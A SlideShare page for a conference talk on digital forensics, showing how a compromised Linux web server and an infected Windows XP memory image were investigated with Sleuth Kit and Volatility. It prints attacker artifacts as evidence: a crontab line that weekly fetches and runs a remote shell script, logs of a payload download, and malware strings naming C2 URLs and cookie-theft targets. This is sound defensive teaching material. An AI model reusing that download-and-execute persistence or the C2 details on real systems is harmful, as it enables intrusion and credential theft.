SlideShare a Scribd company logo

Adventures in Digital Forensics

_
_xhr_

This document discusses digital forensics and describes analyzing a compromised system. It explains that digital forensics involves examining disk, memory, and log files for evidence. The document provides examples of a crontab job downloading files weekly and log entries showing HTTP requests downloading files containing shell scripts that are then executed, indicating potential malware. It also lists files and directories on the system and their permissions.

Technology
Related topics:
Digital Forensics
1 of 52
Downloaded 16 times
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
Adventures in Digital Forensics xhr xhr giessen.ccc.de
xhr Easterhegg 2014 2 $ whoami
xhr Easterhegg 2014 3 What is Digital Forensics?
xhr Easterhegg 2014 4 What the media thinks...
xhr Easterhegg 2014 5 + Flickr. West Midlands Police. CC-BY-2.0
xhr Easterhegg 2014 6 What it is really about ...
xhr Easterhegg 2014 7 Flickr. Naughty Architect. CC-BY-2.0
xhr Easterhegg 2014 8 Srsly? Crawling a Shitload of Data * Hey, that's cool. It's Big Data[TM] !!1 *
xhr Easterhegg 2014 9 Discover unknown malware * sadly, known as well :/ *
xhr Easterhegg 2014 11 Learn new Things[TM]
xhr Easterhegg 2014 12 Two Approaches
xhr Easterhegg 2014 13 Disc Forensics
xhr Easterhegg 2014 14 Memory Forensics
xhr Easterhegg 2014 15 Post-mortem Analysis
xhr Easterhegg 2014 16 MAC Time Analysis
xhr Easterhegg 2014 17 Tim e stam pM AC User Perm issions Path Size Time Last Modified Last Accessed Last Changed Birth time
xhr Easterhegg 2014 18 [...] m...,­rw­r­­r­­,www­data,www­data,0,"/var/tmp/checkblocks" m...,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/.tar" m...,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/.ew3" m...,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/ew3" m...,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/.bbb" m...,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/apache2" m...,­rw­r­­r­­,www­data,www­data,0,"/var/tmp/checkfs" m...,­rw­r­­r­­,www­data,www­data,0,"/var/tmp/checkswap" m...,­rw­r­­r­­,www­data,www­data,0,"/var/tmp/e.tar.xz" ..c.,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/ew3" .ac.,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/tar" .a..,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/ew3" ma..,­rw­r­­r­­,www­data,www­data,0,"/tmp/.ICE­unix/­log/cpuminer­quark.zip" .a..,­rw­r­­r­­,www­data,www­data,0,"/tmp/.ICE­unix/­log/include/zconf.h" .a..,­rw­r­­r­­,www­data,www­data,0,"/tmp/.ICE­unix/­log/include/zlib.h" .a..,­rwxr­xr­x,www­data,www­data,0,"/tmp/.ICE­unix/­log/bin/external­ip" .a..,­rwxr­xr­x,www­data,www­data,0,"/tmp/.ICE­unix/­log/bin/upnpc" .a..,­rw­r—r­­,www­data,www­data,0,"/tmp/.ICE­unix/­log/lib/libminiupnpc.a" [...]
xhr Easterhegg 2014 19 [...] m...,­rw­r­­r­­,www­data,www­data,0,"/var/tmp/checkblocks" m...,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/.tar" m...,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/.ew3" m...,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/ew3" m...,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/.bbb" m...,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/apache2" m...,­rw­r­­r­­,www­data,www­data,0,"/var/tmp/checkfs" m...,­rw­r­­r­­,www­data,www­data,0,"/var/tmp/checkswap" m...,­rw­r­­r­­,www­data,www­data,0,"/var/tmp/e.tar.xz" ..c.,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/ew3" .ac.,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/tar" .a..,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/ew3" ma..,­rw­r­­r­­,www­data,www­data,0,"/tmp/.ICE­unix/­log/cpuminer­quark.zip" .a..,­rw­r­­r­­,www­data,www­data,0,"/tmp/.ICE­unix/­log/include/zconf.h" .a..,­rw­r­­r­­,www­data,www­data,0,"/tmp/.ICE­unix/­log/include/zlib.h" .a..,­rwxr­xr­x,www­data,www­data,0,"/tmp/.ICE­unix/­log/bin/external­ip" .a..,­rwxr­xr­x,www­data,www­data,0,"/tmp/.ICE­unix/­log/bin/upnpc" .a..,­rw­r—r­­,www­data,www­data,0,"/tmp/.ICE­unix/­log/lib/libminiupnpc.a" [...]
xhr Easterhegg 2014 20 [...] .ac.,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/.bbb" .ac.,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/.ew3" .ac.,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/.tar" m.c.,­rwxr­xr­x,www­data,www­data,0,"/tmp/.ICE­unix/cw" m...,­rwsr­sr­x,www­data,www­data,0,"/tmp/.ICE­unix/sid" mac.,­rw­r­­r­­,www­data,www­data,0,"/tmp/.a" ..c.,­rw­­­­­­­,www­data,www­data,0,"/var/www/.ssh/authorized_keys" .a..,­rwxr­xr­x,www­data,www­data,0,"/tmp/.ICE­unix/cw" ..c.,­rwsr­sr­x,www­data,www­data,0,"/tmp/.ICE­unix/sid" ..c.,drwx­­­­­­,www­data,www­data,0,"/var/www/.ssh" .a..,drwx­­­­­­,www­data,www­data,0,"/var/www/.ssh" .a..,­rw­r­­r­­,www­data,root,0,"/home/cron/www­data.tab" m.c.,­rw­­­­­­­,www­data,ssh,0,"/var/spool/cron/crontabs/www­data" .a..,­rw­­­­­­­,www­data,ssh,0,"/var/spool/cron/crontabs/www­data" [...]
xhr Easterhegg 2014 21 [...] .ac.,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/.bbb" .ac.,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/.ew3" .ac.,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/.tar" m.c.,­rwxr­xr­x,www­data,www­data,0,"/tmp/.ICE­unix/cw" m...,­rwsr­sr­x,www­data,www­data,0,"/tmp/.ICE­unix/sid" mac.,­rw­r­­r­­,www­data,www­data,0,"/tmp/.a" ..c.,­rw­­­­­­­,www­data,www­data,0,"/var/www/.ssh/authorized_keys" .a..,­rwxr­xr­x,www­data,www­data,0,"/tmp/.ICE­unix/cw" ..c.,­rwsr­sr­x,www­data,www­data,0,"/tmp/.ICE­unix/sid" ..c.,drwx­­­­­­,www­data,www­data,0,"/var/www/.ssh" .a..,drwx­­­­­­,www­data,www­data,0,"/var/www/.ssh" .a..,­rw­r­­r­­,www­data,root,0,"/home/cron/www­data.tab" m.c.,­rw­­­­­­­,www­data,ssh,0,"/var/spool/cron/crontabs/www­data" .a..,­rw­­­­­­­,www­data,ssh,0,"/var/spool/cron/crontabs/www­data" [...]
xhr Easterhegg 2014 22 On-disk Analysis
xhr Easterhegg 2014 23 host:/tmp/.ICE­unix/­log# ls ­l total 5088 ­rw­r­­r­­  1 www­data www­data     238 Dec 17 16:26   drwxr­xr­x  2 www­data www­data    4096 Dec 15 04:01 bin ­rw­r­­r­­  1 www­data www­data  526652 Aug 20 22:05 cpuminer­quark.zip ­rw­r­­r­­  1 www­data www­data  526652 Aug 20 22:05 cpuminer­quark.zip.1 ­rw­r­­r­­  1 www­data www­data  526652 Aug 20 22:05 cpuminer­quark.zip.2 ­rw­r­­r­­  1 www­data www­data  526652 Aug 20 22:05 cpuminer­quark.zip.3 drwxr­xr­x  3 www­data www­data      22 Dec 14 12:41 doc drwxr­xr­x  5 www­data www­data     126 Dec 15 04:01 include drwxr­xr­x  4 www­data www­data    4096 Dec 17 16:26 lib drwxr­xr­x  3 www­data www­data      17 Dec 14 12:41 man ­rwxr­xr­x  1 www­data www­data       0 Dec 14 03:24 rsyslogd ­rw­r­­r­­  1 www­data www­data 3077358 Dec 16 16:53 sshc.tgz drwxr­xr­x  6 www­data www­data      71 Dec 15 03:53 ssl
xhr Easterhegg 2014 24 Crontab FTW! @weekly wget ­q hxxp://221.132.37.XX/scen  ­O /tmp/sh; sh /tmp/sh; rm ­rd /tmp/sh
xhr Easterhegg 2014 25 Log Files
xhr Easterhegg 2014 26 [error] [client X] ­­20XX­XX­XX 03:09:34­­  hxxp://93.174.4.XX/xmrl/d1e.txt [error] [client X] Connecting to 93.174.4.XX:80... [error] [client X] connected. [error] [client X] HTTP request sent, awaiting response... [error] [client X] 200 OK [...] [error] [client X] Saving to: `d1e.txt‚ [error] [client X] 20XX­XX­XX 03:09:34 (208 KB/s) ­ `d1e.txt'  saved [16732/16732] [error] [client X] % Total % Received % Xferd Average Speed Time  Time Time Current [error] [client X] Dload Upload Total Spent Left Speed [error] [client X] r 6 16732 6 1180 0 0 10717 0 0:00:01 ­­:­­:­­  0:00:01 10717 error] [client X] r100 16732 100 16732 0 0 76812 0 ­­:­­:­­  ­­:­­:­­ ­­:­­:­­ 141k [error] [client X] sh: lwp­download: command not found [error] [client X] sh: fetch: command not found [error] [client X] kill: usage: kill [­s sigspec | ­n signum |  ­sigspec] pid | jobspec ... or kill ­l [sigspec]
xhr Easterhegg 2014 27 [error] [client X] ­­20XX­XX­XX 03:09:34­­  hxxp://93.174.4.XX/xmrl/d1e.txt [error] [client X] Connecting to 93.174.4.XX:80... [error] [client X] connected. [error] [client X] HTTP request sent, awaiting response... [error] [client X] 200 OK [...] [error] [client X] Saving to: `d1e.txt‚ [error] [client X] 20XX­XX­XX 03:09:34 (208 KB/s) ­ `d1e.txt'  saved [16732/16732] [error] [client X] % Total % Received % Xferd Average Speed Time  Time Time Current [error] [client X] Dload Upload Total Spent Left Speed [error] [client X] r 6 16732 6 1180 0 0 10717 0 0:00:01 ­­:­­:­­  0:00:01 10717 error] [client X] r100 16732 100 16732 0 0 76812 0 ­­:­­:­­  ­­:­­:­­ ­­:­­:­­ 141k [error] [client X] sh: lwp­download: command not found [error] [client X] sh: fetch: command not found [error] [client X] kill: usage: kill [­s sigspec | ­n signum |  ­sigspec] pid | jobspec ... or kill ­l [sigspec]
xhr Easterhegg 2014 28 [error] [client X] ­­20XX­XX­XX 03:09:34­­  hxxp://93.174.4.XX/xmrl/d1e.txt [error] [client X] Connecting to 93.174.4.XX:80... [error] [client X] connected. [error] [client X] HTTP request sent, awaiting response... [error] [client X] 200 OK [...] [error] [client X] Saving to: `d1e.txt‚ [error] [client X] 20XX­XX­XX 03:09:34 (208 KB/s) ­ `d1e.txt'  saved [16732/16732] [error] [client X] % Total % Received % Xferd Average Speed Time  Time Time Current [error] [client X] Dload Upload Total Spent Left Speed [error] [client X] r 6 16732 6 1180 0 0 10717 0 0:00:01 ­­:­­:­­  0:00:01 10717 error] [client X] r100 16732 100 16732 0 0 76812 0 ­­:­­:­­  ­­:­­:­­ ­­:­­:­­ 141k [error] [client X] sh: lwp­download: command not found [error] [client X] sh: fetch: command not found [error] [client X] kill: usage: kill [­s sigspec | ­n signum |  ­sigspec] pid | jobspec ... or kill ­l [sigspec]
xhr Easterhegg 2014 29 [error] [client X] ­­20XX­XX­XX 03:09:34­­  hxxp://93.174.4.XX/xmrl/d1e.txt [error] [client X] Connecting to 93.174.4.XX:80... [error] [client X] connected. [error] [client X] HTTP request sent, awaiting response... [error] [client X] 200 OK [...] [error] [client X] Saving to: `d1e.txt‚ [error] [client X] 20XX­XX­XX 03:09:34 (208 KB/s) ­ `d1e.txt'  saved [16732/16732] [error] [client X] % Total % Received % Xferd Average Speed Time  Time Time Current [error] [client X] Dload Upload Total Spent Left Speed [error] [client X] r 6 16732 6 1180 0 0 10717 0 0:00:01 ­­:­­:­­  0:00:01 10717 error] [client X] r100 16732 100 16732 0 0 76812 0 ­­:­­:­­  ­­:­­:­­ ­­:­­:­­ 141k [error] [client X] sh: lwp­download: command not found [error] [client X] sh: fetch: command not found [error] [client X] kill: usage: kill [­s sigspec | ­n signum |  ­sigspec] pid | jobspec ... or kill ­l [sigspec]
xhr Easterhegg 2014 30 Write Remote Logs!!1
xhr Easterhegg 2014 31 And use Smart Indexing loghost:/syslog/live $ du -hs 4.5T . :)
xhr Easterhegg 2014 32 Memory Forensics 101
xhr Easterhegg 2014 33 Mem dump == IDDQD
xhr Easterhegg 2014 34 Linux → Windows
xhr Easterhegg 2014 35 Details about the Victim Determining profile based on KDBG search...           Suggested Profile(s) : WinXPSP2x86,  WinXPSP3x86 (Instantiated with WinXPSP2x86)                       PAE type : PAE                            DTB : 0x28a000L                           KDBG : 0x80545ce0           Number of Processors : 1      Image Type (Service Pack) : 3 $ file ram.elf  ram.elf: ELF 64­bit LSB core file x86­64,  version 1 (SYSV) $ ls ­l ram.elf  293M ­rw­­­­­­­ 1 xhr xhr 293M Apr 19 15:29  ram.elf
xhr Easterhegg 2014 36 Check Networking
xhr Easterhegg 2014 37 Offset(P)  Local Address             Remote Address            Pid ­­­­­­­­­­ ­­­­­­­­­­­­­­­­­­­­­­­­­ ­­­­­­­­­­­­­­­­­­­­­­­­­ ­­­ 0x017af800 10.0.2.15:2859            4.26.224.125:80           360 0x017c3008 10.0.2.15:2841            4.26.224.125:80           360 0x017c3270 10.0.2.15:2845            68.232.35.169:80          360 0x017c42c0 10.0.2.15:2771            31.13.64.145:443          360 0x017c45d0 10.0.2.15:2770            23.37.37.163:80           360 0x017d2aa8 10.0.2.15:2857            4.26.224.125:80           360 0x017d75c0 10.0.2.15:2846            162.159.243.176:80        360 0x017d79e8 10.0.2.15:2773            2.18.162.110:443          360 0x017d7cf8 10.0.2.15:2772            95.100.249.129:80         360 0x017d8d28 10.0.2.15:2858            4.26.224.125:80           360 0x017db9e8 10.0.2.15:2778            131.253.37.30:80          360 0x017dbcf8 10.0.2.15:2867            8.21.198.146:80           360 0x017ddbe8 10.0.2.15:2769            23.37.37.163:80           360 0x017de6e8 10.0.2.15:2761            91.103.137.3:80           360 0x01803968 10.0.2.15:2754            23.43.118.238:80          360 0x01803e68 10.0.2.15:2757            173.194.69.139:80        3460 0x0195e458 10.0.2.15:2854            31.192.116.24:80          360
xhr Easterhegg 2014 38 Offset(P)  Local Address             Remote Address            Pid ­­­­­­­­­­ ­­­­­­­­­­­­­­­­­­­­­­­­­ ­­­­­­­­­­­­­­­­­­­­­­­­­ ­­­ 0x017af800 10.0.2.15:2859            4.26.224.125:80           360 0x017c3008 10.0.2.15:2841            4.26.224.125:80           360 0x017c3270 10.0.2.15:2845            68.232.35.169:80          360 0x017c42c0 10.0.2.15:2771            31.13.64.145:443          360 0x017c45d0 10.0.2.15:2770            23.37.37.163:80           360 0x017d2aa8 10.0.2.15:2857            4.26.224.125:80           360 0x017d75c0 10.0.2.15:2846            162.159.243.176:80        360 0x017d79e8 10.0.2.15:2773            2.18.162.110:443          360 0x017d7cf8 10.0.2.15:2772            95.100.249.129:80         360 0x017d8d28 10.0.2.15:2858            4.26.224.125:80           360 0x017db9e8 10.0.2.15:2778            131.253.37.30:80          360 0x017dbcf8 10.0.2.15:2867            8.21.198.146:80           360 0x017ddbe8 10.0.2.15:2769            23.37.37.163:80           360 0x017de6e8 10.0.2.15:2761            91.103.137.3:80           360 0x01803968 10.0.2.15:2754            23.43.118.238:80          360 0x01803e68 10.0.2.15:2757            173.194.69.139:80        3460 0x0195e458 10.0.2.15:2854            31.192.116.24:80          360
xhr Easterhegg 2014 39 Check IE History
xhr Easterhegg 2014 40 admin@about:Home admin@http://127.0.0.1:1088/app/index.html admin@http://ccc.de admin@http://ccc.de/de/rss/updates.rdf admin@http://ccc.de/de/rss/updates.xml admin@http://de.msn.com/?rd=1&ucc=DE&dcc=DE&opt=0 admin@http://edpn.ebay.com/engagement?INIT=575302488402|22076974|707189966101462|1|0| 1||http://de.msn.com/?rd=1&ucc=DE&dcc=DE&opt=0 admin@http://go.microsoft.com/fwlink/?LinkID=121792 admin@http://home.microsoft.com admin@https://download­installer.cdn.mozilla.net/pub/firefox/releases/26.0/win32/en­ US/Firefox%20Setup%20Stub%2026.0.exe admin@http://update.microsoft.com/favicon.ico admin@http://update.microsoft.com/microsoftupdate/v6/default.aspx admin@http://update.microsoft.com/microsoftupdate/v6/default.aspx?ln=en­us admin@http://update.microsoft.com/microsoftupdate/v6/resultslist.aspx?ln=en­us&id=6 admin@http://windowsupdate.microsoft.com/favicon.ico admin@http://windowsupdate.microsoft.com/windowsupdate/v6/default.aspx admin@http://windowsupdate.microsoft.com/windowsupdate/v6/default.aspx?ln=en­us admin@http://windowsupdate.microsoft.com/windowsupdate/v6/resultslist.aspx?ln=en­ us&id=6 admin@http://windowsupdate.microsoft.com/windowsupdate/v6/splash.aspx?ln=en­us&page=8 admin@http://www.microsoft.com/isapi/redir.dll?prd=ie&pver=6&ar=msnhome admin@http://www.mozilla.org/en­US admin@http://www.mozilla.org/en­US/products/download.html?product=firefox­ stub&os=win&lang=en­US admin@http://www.msn.com admin@http://www.youporn.com/rss admin@res://ief admin@res://ieframe.dll/tabswelcome.htm
xhr Easterhegg 2014 42 Any Malicious Processes?
xhr Easterhegg 2014 43 Offset(V)  Name                    PID   PPID   Thds     Hnds  ­­­­­­­­­­ ­­­­­­­­­­­­­­­­­­­­ ­­­­­­ ­­­­­­ ­­­­­­ ­­­­­­­­  0x819cca00 System                    4      0     53      359  0x81843930 SMSS.EXE                324      4      3       19  0x8170dda0 CSRSS.EXE               608    324      9      433  0x8171c1c8 WINLOGON.EXE            632    324     17      504  0x8170ba98 SERVICES.EXE            676    632     15      258  0x81706a98 LSASS.EXE               688    632     24      369  0x8196e560 VBOXSERVICE.EXE         840    676      8      105  0x81793da0 SVCHOST.EXE             884    676     18      201  0x8170db20 SVCHOST.EXE             972    676      9      248  0x81823990 SVCHOST.EXE            1092    676     77     1492  0x81745c18 SVCHOST.EXE            1140    676      6       84  0x81703560 SVCHOST.EXE            1176    676     12      172  0x817d8730 EXPLORER.EXE           1548   1496     21      672  0x8183caf0 SPOOLSV.EXE            1664    676     10      117  0x81738da0 VBOXTRAY.EXE           1860   1548     10      936  0x81724470 CTFMON.EXE             1872   1548      4       94  0x816f0650 SVCHOST.EXE             584    676      4      105  0x817f4da0 ALG.EXE                 460    676      6      106  0x819215d0 firefox.exe            3460   1548     36      462  0x817313c0 IEXPLORE.EXE           4008   1548     16      412  0x81706228 IEXPLORE.EXE            360   4008     29      994  0x81870888 UPS_COLLECT_LET        1156   1548      4       34 
xhr Easterhegg 2014 44 Offset(V)  Name                    PID   PPID   Thds     Hnds  ­­­­­­­­­­ ­­­­­­­­­­­­­­­­­­­­ ­­­­­­ ­­­­­­ ­­­­­­ ­­­­­­­­  0x819cca00 System                    4      0     53      359  0x81843930 SMSS.EXE                324      4      3       19  0x8170dda0 CSRSS.EXE               608    324      9      433  0x8171c1c8 WINLOGON.EXE            632    324     17      504  0x8170ba98 SERVICES.EXE            676    632     15      258  0x81706a98 LSASS.EXE               688    632     24      369  0x8196e560 VBOXSERVICE.EXE         840    676      8      105  0x81793da0 SVCHOST.EXE             884    676     18      201  0x8170db20 SVCHOST.EXE             972    676      9      248  0x81823990 SVCHOST.EXE            1092    676     77     1492  0x81745c18 SVCHOST.EXE            1140    676      6       84  0x81703560 SVCHOST.EXE            1176    676     12      172  0x817d8730 EXPLORER.EXE           1548   1496     21      672  0x8183caf0 SPOOLSV.EXE            1664    676     10      117  0x81738da0 VBOXTRAY.EXE           1860   1548     10      936  0x81724470 CTFMON.EXE             1872   1548      4       94  0x816f0650 SVCHOST.EXE             584    676      4      105  0x817f4da0 ALG.EXE                 460    676      6      106  0x819215d0 firefox.exe            3460   1548     36      462  0x817313c0 IEXPLORE.EXE           4008   1548     16      412  0x81706228 IEXPLORE.EXE            360   4008     29      994  0x81870888 UPS_COLLECT_LET        1156   1548      4       34 
xhr Easterhegg 2014 45 Offset(V)  Name                    PID   PPID   Thds     Hnds  ­­­­­­­­­­ ­­­­­­­­­­­­­­­­­­­­ ­­­­­­ ­­­­­­ ­­­­­­ ­­­­­­­­  0x819cca00 System                    4      0     53      359  0x81843930 SMSS.EXE                324      4      3       19  0x8170dda0 CSRSS.EXE               608    324     10      435  0x8171c1c8 WINLOGON.EXE            632    324     17      504  0x8170ba98 SERVICES.EXE            676    632     15      258  0x81706a98 LSASS.EXE               688    632     24      369  0x8196e560 VBOXSERVICE.EXE         840    676      8      105  0x81793da0 SVCHOST.EXE             884    676     18      201  0x8170db20 SVCHOST.EXE             972    676      9      248  0x81823990 SVCHOST.EXE            1092    676     77     1492  0x81745c18 SVCHOST.EXE            1140    676      6       84  0x81703560 SVCHOST.EXE            1176    676     12      172  0x817d8730 EXPLORER.EXE           1548   1496     21      672  0x8183caf0 SPOOLSV.EXE            1664    676     10      117  0x81738da0 VBOXTRAY.EXE           1860   1548     10      939  0x81724470 CTFMON.EXE             1872   1548      4       94  0x816f0650 SVCHOST.EXE             584    676      4      105  0x817f4da0 ALG.EXE                 460    676      6      106  0x819215d0 firefox.exe            3460   1548     36      462  0x817313c0 IEXPLORE.EXE           4008   1548     16      412  0x81706228 IEXPLORE.EXE            360   4008     29      994  0x81887620 KB01065453.exe         3564   1156      1       15 
xhr Easterhegg 2014 46 Process Dump
xhr Easterhegg 2014 47
xhr Easterhegg 2014 48 Putting it into IDA Pro * Having a Pro license totally rocks :) *
xhr Easterhegg 2014 49 Detailz kthxbye! 000000011410   000000411410      0   http://113.130.65.77:8080/mx5/C/in/ 000000011458   000000411458      0   http://199.71.212.78:8080/mx5/C/in/ 0000000114A0   0000004114A0      0   http://211.191.168.98:8080/mx5/C/in/ 0000000114F0   0000004114F0      0   http://195.250.139.10:8080/mx5/C/in/ 000000011540   000000411540      0   http://173.224.208.60:8080/mx5/C/in/ 000000011590   000000411590      0   http://46.51.218.71:8080/mx5/C/in/ 0000000115D8   0000004115D8      0   http://89.97.55.33:8080/mx5/C/in/ 000000011620   000000411620      0   http://71.89.140.153:8080/mx5/C/in/ 000000011668   000000411668      0   http://195.111.72.46:8080/mx5/C/in/ 0000000116B0   0000004116B0      0   http://84.53.217.109:8080/mx5/C/in/ 0000000116F8   0000004116F8      0   http://78.46.64.17:8080/mx5/C/in/ 0000000111F8   0000004111F8      0   SoftwareMicrosoftWindows NTC%08X 000000011254   000000411254      0   MozillaFirefoxProfiles 000000011288   000000411288      0   cookies.* 00000001129C   00000041129C      0   Macromedia 0000000112BC   0000004112BC      0   firefox.exe 0000000112D4   0000004112D4      0   explorer.exe 000000011C60   000000411C60      0   SoftwareMicrosoftWindows NTS%08X 000000011CEB   000000411CEB      0   sKB%08d.exe 000000011D08   000000411D08      0   SoftwareMicrosoftWindowsCurrentVersionRun
xhr Easterhegg 2014 50 Selected Tools
xhr Easterhegg 2014 51 The Sleuth Kit http://www.sleuthkit.org
xhr Easterhegg 2014 52 The Volatility Framework https://code.google.com/p/volatility/
xhr Easterhegg 2014 53 Fin!
xhr Easterhegg 2014 54 Q & A xhr xhr giessen.ccc.de @ @_xhr_

More Related Content

PDF
LISA Qooxdoo Tutorial Handouts
Tobias Oetiker
 
PPTX
SCWCD : Handling exceptions : CHAP : 5
Ben Abdallah Helmi
 
PDF
Fabio Ghioni
Fabio Ghioni
 
PDF
Configuring Greenstone's OAI server
Diego Spano
 
PPT
User Profiles: I Didn't Know I Could Do That (Updated Demo)
Stacy Deere
 
PDF
Hibernate reference pt-br
Leonardo Brancalhão
 
PDF
Collaboration with Eclipse final
Kenu, GwangNam Heo
 
PDF
ORCID ED Report 10292013
ORCID, Inc
 
LISA Qooxdoo Tutorial Handouts
Tobias Oetiker
 
SCWCD : Handling exceptions : CHAP : 5
Ben Abdallah Helmi
 
Fabio Ghioni
Fabio Ghioni
 
Configuring Greenstone's OAI server
Diego Spano
 
User Profiles: I Didn't Know I Could Do That (Updated Demo)
Stacy Deere
 
Hibernate reference pt-br
Leonardo Brancalhão
 
Collaboration with Eclipse final
Kenu, GwangNam Heo
 
ORCID ED Report 10292013
ORCID, Inc
 

Viewers also liked (17)

PPT
What's Next with Government Big Data
GovLoop
 
PPTX
Lacerte Helpful Resources
intuitaccts
 
PDF
Web service overview
Saran Yuwanna
 
PPT
缓存技术浅谈
Robbin Fan
 
PDF
AVG Community Powered Threat Report: Q1 2012
AVG Technologies AU
 
PDF
Social Networking
Caroline Cerveny
 
PDF
Montando seu DataCenter Pessoal - Fernando Massen
Tchelinux
 
PDF
Caderno SISP 2012
GovBR
 
PDF
Especial Linux Magazine Software Público
GovBR
 
PPTX
SCWCD : The servlet model CHAP : 2
Ben Abdallah Helmi
 
PDF
Tomcat Maven Plugin
Olivier Lamy
 
PDF
Nosotros Elmedio
Espacio Público
 
PDF
Mision y vision .pdf ss
Ronnyonam
 
DOCX
Enterprise Resource Planning in the IT Field- an Opportunity for System Devel...
Quinnipiac University
 
PPTX
State of virtualisation -- 2012
Jonathan Sinclair
 
PDF
El papel del vídeo en la Web 2.0
Pablo Olmeda
 
PDF
Django - the first five years
Jacob Kaplan-Moss
 
What's Next with Government Big Data
GovLoop
 
Lacerte Helpful Resources
intuitaccts
 
Web service overview
Saran Yuwanna
 
缓存技术浅谈
Robbin Fan
 
AVG Community Powered Threat Report: Q1 2012
AVG Technologies AU
 
Social Networking
Caroline Cerveny
 
Montando seu DataCenter Pessoal - Fernando Massen
Tchelinux
 
Caderno SISP 2012
GovBR
 
Especial Linux Magazine Software Público
GovBR
 
SCWCD : The servlet model CHAP : 2
Ben Abdallah Helmi
 
Tomcat Maven Plugin
Olivier Lamy
 
Nosotros Elmedio
Espacio Público
 
Mision y vision .pdf ss
Ronnyonam
 
Enterprise Resource Planning in the IT Field- an Opportunity for System Devel...
Quinnipiac University
 
State of virtualisation -- 2012
Jonathan Sinclair
 
El papel del vídeo en la Web 2.0
Pablo Olmeda
 
Django - the first five years
Jacob Kaplan-Moss
 
Ad

Similar to Adventures in Digital Forensics (18)

PDF
DEF CON 24 - workshop - Craig Young - brainwashing embedded systems
Felipe Prado
 
PDF
Digital Forensic: Brief Intro & Research Challenge
Aung Thu Rha Hein
 
PPTX
Digital forensic tools
Parsons Corporation
 
PDF
Digital Forensics
Vikas Jain
 
PPTX
Appsec 2013-krehel-ondrej-forensic-investigations-of-web-exploitations
drewz lin
 
PPTX
Combating cyber security through forensic investigation tools
Venkata Sreeram
 
PPTX
Draft current state of digital forensic and data science
Damir Delija
 
PDF
SOHOpelessly Broken
The Security of Things Forum
 
PDF
Would you Rather Have Telemetry into 2 Attacks or 20? An Insight Into Highly ...
MITRE ATT&CK
 
PDF
CNIT 121: 14 Investigating Applications
Sam Bowne
 
PDF
the Cyber - Forensics - Lab - Manual . pdf
22cc005
 
PPTX
Digital forensics lessons
Amr Nasr
 
PPTX
Why cant all_data_be_the_same
Skyler Lewis
 
PPTX
Beauty of open source in cyber forensics
saddamhusain hadimani
 
PPTX
Open Source Forensics
CTIN
 
PDF
Digital forensic science and its scope manesh t
Manesh T
 
PPTX
BSIDES-PR Keynote Hunting for Bad Guys
Joff Thyer
 
PPTX
What's new in​ CEHv11?
EC-Council
 
DEF CON 24 - workshop - Craig Young - brainwashing embedded systems
Felipe Prado
 
Digital Forensic: Brief Intro & Research Challenge
Aung Thu Rha Hein
 
Digital forensic tools
Parsons Corporation
 
Digital Forensics
Vikas Jain
 
Appsec 2013-krehel-ondrej-forensic-investigations-of-web-exploitations
drewz lin
 
Combating cyber security through forensic investigation tools
Venkata Sreeram
 
Draft current state of digital forensic and data science
Damir Delija
 
SOHOpelessly Broken
The Security of Things Forum
 
Would you Rather Have Telemetry into 2 Attacks or 20? An Insight Into Highly ...
MITRE ATT&CK
 
CNIT 121: 14 Investigating Applications
Sam Bowne
 
the Cyber - Forensics - Lab - Manual . pdf
22cc005
 
Digital forensics lessons
Amr Nasr
 
Why cant all_data_be_the_same
Skyler Lewis
 
Beauty of open source in cyber forensics
saddamhusain hadimani
 
Open Source Forensics
CTIN
 
Digital forensic science and its scope manesh t
Manesh T
 
BSIDES-PR Keynote Hunting for Bad Guys
Joff Thyer
 
What's new in​ CEHv11?
EC-Council
 
Ad

Recently uploaded (20)

PDF
TokAI - TikTok AI Agent : The First AI Application That Analyzes 10,000+ Vira...
SOFTTECHHUB
 
PDF
Empathic Computing: Creating Shared Understanding
Mark Billinghurst
 
PPTX
Digital-Transformation-Roadmap-for-Companies.pptx
David Malick Dieng
 
PDF
Advanced methodologies resolving dimensionality complications for autism neur...
IAESIJAI
 
PPTX
OMC Textile Division Presentation 2021.pptx
JahangirAlam816069
 
PDF
August Patch Tuesday
Ivanti
 
PPTX
Machine Learning_overview_presentation.pptx
kondavamsidharreddy2
 
PDF
Diabetes mellitus diagnosis method based random forest with bat algorithm
IAESIJAI
 
PPTX
Tartificialntelligence_presentation.pptx
ry7r52mzb4
 
PDF
MIND Revenue Release Quarter 2 2025 Press Release
MIND CTI
 
PPT
Teaching material agriculture food technology
LiaRayya
 
PDF
Mushroom cultivation and it's methods.pdf
mailmeonrishi
 
PDF
Building Integrated photovoltaic BIPV_UPV.pdf
SandeepSingh286037
 
PDF
A comparative study of natural language inference in Swahili using monolingua...
IAESIJAI
 
PDF
